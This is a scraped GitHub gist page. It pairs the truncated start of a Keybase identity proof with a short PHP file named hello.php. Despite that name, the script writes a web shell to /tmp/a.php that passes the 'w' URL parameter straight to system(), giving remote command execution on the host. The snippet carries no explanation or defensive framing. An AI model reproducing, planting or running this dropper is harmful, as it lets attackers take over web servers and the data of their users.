Skip to content

Instantly share code, notes, and snippets.

Keybase proof

I hereby claim:

  • I am nikofil on github.
  • I am nfil (https://keybase.io/nfil) on keybase.
  • I have a public key ASC7Svbv2jcJWPSU86VlXUSaE55fZnjRiC1HrYOH_XMSAwo

To claim this, I am signing this object:

@nikofil
nikofil / hello.php
Last active September 27, 2016 18:18
<?php
$myfile = fopen("/tmp/a.php", "w") or die("Unable to open file!");
$txt = "<?php system($_GET['w']); echo('here'); ?>";
fwrite($myfile, $txt);
fclose($myfile);
?>